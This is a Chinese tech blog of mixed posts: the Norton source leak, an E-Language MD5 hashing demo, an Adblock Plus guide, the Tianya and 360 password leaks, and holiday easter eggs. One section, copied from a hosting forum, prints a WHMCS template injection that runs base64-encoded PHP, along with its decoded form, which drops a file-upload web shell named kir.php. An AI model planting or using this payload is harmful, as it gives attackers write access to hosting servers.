海南仙岛软件工作室

北京时间1月6日消息，据国外媒体报道，一个自称为“Lords of Dharmaraja”的黑客组织在网络上公布了一份据说涉及到赛门铁克的诺顿杀毒软件内部机密的文件，该黑客组织还威胁要公开诺顿杀毒软件的源代码。

该黑客组织在Pastebin上公布了一份文件并生成该文件涉及到诺顿杀毒软件的工作原理。据说该文件以及威胁要公开的源代码可以帮助其他黑客攻破诺顿软件或在诺顿产品中植入恶意代码。虽然原贴已在Pastebin上被删除，但谷歌搜索中仍存在相关缓存内容。

该黑客组织声称，他们是在对印度军方和情报服务器进行攻击时发现诺顿的源代码的。它在原先发布的贴子中表示：“我们在印度间谍计划(Indian Spy Program)中发现了十多家软件公司的大量源代码。”据说该黑客组织已经与印度防御计划和印度中央调查局签订了协议。

赛门铁克发言人克里斯帕登(Cris Paden)在一封电子邮件中表示，那个黑客组织公布的文件是1999年的一份文件，现在早已经过时。那份文件只是解释了诺顿软件是如何工作的，其中包括了一些功能的名称，但是并不存在任何源代码。

该黑客组织威胁称，它将在晚些时候公开诺顿杀毒软件的源代码。

帕登表示，赛门铁克目前正在调查此事。

赛门铁克的诺顿软件为公司贡献了相当大一部分收入，诺顿软件去年的收入大概为20亿美元，占其总收入的三分之一。如果诺顿软件的源代码被公开，赛门铁克的收益和股价肯定会受到极大的影响。

互联网安全公司Imperva的安全战略主管罗伯特拉齐沃德(Robert Rachwald)称：“如果这份文件来自1999年，那么诺顿的源代码很可能已经发生了相当大的变化。 但是如果赛门铁克在这几年没有对诺顿进行大幅度修改，某些源代码可能根本没有发生过变化，那么黑客是有可能找出办法来攻破诺顿的。”
诺顿源代码遭窃事件进展 ：官方确认黑客获得了产品的源代码，但不是先前预期的个人版产品，受影响的是Symantec Endpoint Protection 11.0 和Symantec Antivirus 10.2。官方同时表示，受影响的代码在过去几年中已经做了大幅度改动，更多的消息要等到星期五下午（美国时间）

因为我只懂使用易语言，所以只用易语言进行演示….
在CSDN和天涯等数据被泄露的事件中，无一不暴露出开发商与开发平台对用户信息的保护薄弱，很多平台居然使用的是明码保存用户信息和密码.
目前使用最广泛的加密方式是MD5加密，对于网上说的MD5对碰破解，因为对这方面没有怎么接触过，不过我大致以为，所谓的MD5碰撞破解可能就是把常用的一些用户名和密码事先用MD5加密后存入数据库，这样可以得知这些用户名和密码MD5加密后的内容，例如：
admin|123456789MD5加密过后的内容就是07abd66a8edf1bdd4b0ec3aefd79d26a在得到用户名和密码后，可以用MD5加密这些数据再和数据库里的碰撞对比，如果加密后的MD5哈希值是07abd66a8edf1bdd4b0ec3aefd79d26a那我们就知道用户名和密码是admin|123456789.
简单的MD5加密可能会被破解，但是如果开发平台或开发者在加密注册用户信息的时候添加指定的字符窜或内容再进行加密，或者多重MD5加密后再把数据保存进数据库，以后用户登录的时候，再用这个数据去对碰数据库里的数据，相信安全性能会高很多，被破解的概率也会小很多.

.版本 2
.支持库 dp1

.程序集 窗口程序集1

.子程序 _按钮1_被单击

.如果 (编辑框1.内容 ≠ “” 且 编辑框2.内容 ≠ “”)
    编辑框3.内容 ＝ 取数据摘要 (到字节集 (编辑框1.内容 ＋ “|” ＋ 编辑框2.内容))
    ' 置剪辑板文本 (编辑框3.内容)
    编辑框4.内容 ＝ 取数据摘要 (到字节集 (编辑框1.内容 ＋ “|” ＋ 编辑框3.内容))
.否则
    信息框 (“您没有输入用户名或密码,请重新输入!”, #信息图标, 标题)
.如果结束

Adblock plush是一款过滤广告的插件（组件），我们现在以Firefox8.0.1和Adblock Plus 2.0.2演示.

被广告弄得搓火吗？被跟随鼠标的标语弄得烦心吗？被横幅弄得感到厌恶吗？立即安装 Adblock Plus 来重新取得 Internet 的控制权并且改变您浏览网页的方式。

Adblock Plus 让您重新取得 Internet 的控制权和您查看网页的方式。本附加组件支持多语言，有超过40个的过滤规则订阅，这些过滤规则会进行自动配置，为您过滤所有来自已知有恶意域的在线广告。Adblock Plus 也允许您通过各种有用的特性来自定义您的过滤规则，这些特性包括：图片的右键菜单、Flash 和 Java 对象的过滤标签、用于移除脚本和样式表的可过滤项目列表。
Adblock Plus 2.0.2：https://addons.mozilla.org/firefox/downloads/latest/1865/addon-1865-latest.xpi?src=dp-btn-primary

安装完成后，可在 Firefox工具栏\工具\看到Adblock Plus选项，在该选项的右边菜单中可以看到多个配置选项，如下图，我们首先要在 Adblock Plus\过滤规则参数选择\添加过滤规则订阅\添加其他订阅\ChinaList(中文)添加中文规则 或相应的规则包规则.然后按下“添加订阅”按钮，重启Firefox浏览器即可.


Adblock Plus白名单设置：如果想对某个网站上的广告进行Adblock Plus白名单设置或不对某个网站的广告进行过滤的话，我们只需要在浏览这个网站的时候，在Firefox工具栏\工具\Adblock Plus\在*******禁用Adblock Plus(勾选)即可不过滤这个网站的广告了，***字符为当前网站域名或地址.

注：资料摘自一主机交流论坛
ticket：工单
whmcs：是一套专为主机业务及其他在线交易开发的客户管理，财务，支持软件.

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}
base64解密后：
$code = <?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
$fo = fopen("kir.php","w");
fwrite($fo,$code);

继前几日CSDN网站被爆出明文存储的用户数据库被窃取之后，今天网上又爆出天涯社区4000万用户资料泄露，账号密码邮箱明文保存，该资料已经网上传播，初步验证为有效数据。

　　天涯社区自称是“全球最具影响力的中文论坛”，创办于1999年，目前，天涯社区注册用户超过6000万，在国内社区型网站颇具人气，而此次泄漏的用户数量达到总数的60%以上。

　　据天涯网新浪微博上的介绍，由于历史原因，天涯社区早期使用过明文密码，2010年之后改成了加密密码。此次遭到黑客泄漏的用户便是2009年保存的备份数据。

　　该份高达386M的泄漏文件“天涯数据.kz”经过下载验证，里面保存了天涯的用户名、密码、邮箱三个数据，根据泄漏的天涯用户名和密码测试，大部分都可以可直接登录到天涯社区。从密码的构成看，泄密的密码很多并非是弱密码，而是8位以上的强密码，因此可以认为天涯的确是以明文方式保存的用户密码。

　　明文存储密码这种蠢事原来并不是CSDN一家网站的个例，大名鼎鼎的天涯社区竟然也这么干，并且在2010年才修正，以前的明文密码也不清除，如此对待用户的个人隐私，天涯实在是令人大跌眼镜。现在用户真的需要扪心自问，中国的那些所谓的大网站，你究竟还信任哪一家？

因此，曾经注册过天涯社区的用户，如果你在天涯的用户和密码也在其他网站使用，那么请立刻修改你的密码为一个新密码，密码设置方法参见我早先的文章《个人密码安全策略》。

　　目前，天涯社区已经在新浪微博上就4000万用户密码泄露一事发布声明和对用户的致歉信，称已向公安机关报案，并呼吁用户修改密码。以下是声明：

Google的文化就是吸引人，今年的圣诞节平安夜，Google换了新logo，分别点击Google logo下面的位置，会有特定的音符，然后会响起平安夜的音乐.http://www.google.com.hk/webhp?hl=zh-CN

百度也有彩蛋： 打开百度，在搜索栏输入“圣诞老人”，点击搜索后，千万不要眨眼！
http://url.cn/2WplUH

Google推出了2012年圣诞节Logo

以前刚接触电脑的时候,是每期都会订阅电脑爱好者杂志和电脑迷杂志,几年后才没有继续订阅,想来到现在也很多年了,想不到刚才在一个网站上偶然看到了一篇电脑爱好者2010年第24期刊登了一篇关于Windows顽固文件强行删除工具(Windel3.1)的文章.非常高兴.

网友的推荐与电脑爱好者的刊登与评语,让我受宠若惊.
其实电脑爱好者官方论坛http://bbs.cfan.com.cn/的编程版块中一直活跃着很多有才华的编程高手.如炉子等.我和他们比起来仍然算是才疏学浅的.
CFAN各个技术版块潜付着很多身怀绝技的各种电脑爱好者,我对电脑系统技术的喜欢与得益更多的是在默默的看帖与学习不时参与他们的讨论中增长的.

电脑爱好者杂志2010年24期下载地址:http://ishare.iask.sina.com.cn/f/15856099.html

12月31日下午，金山网络召开紧急发布会，称360收集网网民信息的服务器存在泄密的危险，并表示已经向相关主管和公安机关报案，并呼吁360用户尽快修改密码信息。
金山网络称，其安全中心心接获用户举报，在搜索引擎上可以找到大量中国互联网用户使用互联网的隐私记录，甚至包括用户登陆网站或邮箱的用户名、密码。经过金山验证后，发现是360在通过其客户端秘密收集用户信息，由于这台服务器的配置问题，导致360不慎将记录了大量用户信息的日志文件被google收录索引，造成大规模外泄。金山表示，如果这些信息被黑客获取，可能造成比较严重的后果。

金山网络CEO傅盛表示，“这些数据非常之多，有几十、上百万，我们估计360覆盖的用户数据都在里面。通过这些数据可以看到网民什么时间上了什么网站，甚至下载情况都能定位到唯一用户，获知全网的访问记录。这是非常严重的隐私泄露事件。”
傅盛还表示，被发现的这台可能是360上千台服务器中的一个，或许是在配置服务器信息时出现错误所致。
金山网络称，目前已经采取三方面的应对措施，其中包括向上级主管和公安机关报案，采取了很多措施分析数据，分析能够造成什么样的伤害，以及对这些信息进行了公证。
昨日有报道称，一位匿名黑客针对360密盘开发了一款专门的解锁软件，可以在瞬间解密任何被360密盘保护的文档。此间，金山网络称当日晚间就此紧急推出相关补丁
曾宣称10万年才能被攻破的360密盘产品不足两月被黑客拿下，一位匿名黑客针对360密盘开发了一款专门的解锁软件。12月31日中午，针对昨晚金山宣布的“360密盘已被黑客攻破”一事，360公司发布声明，称其只是老版本中的Bug，此前已修复，并称金山提供的补丁存在安全漏洞。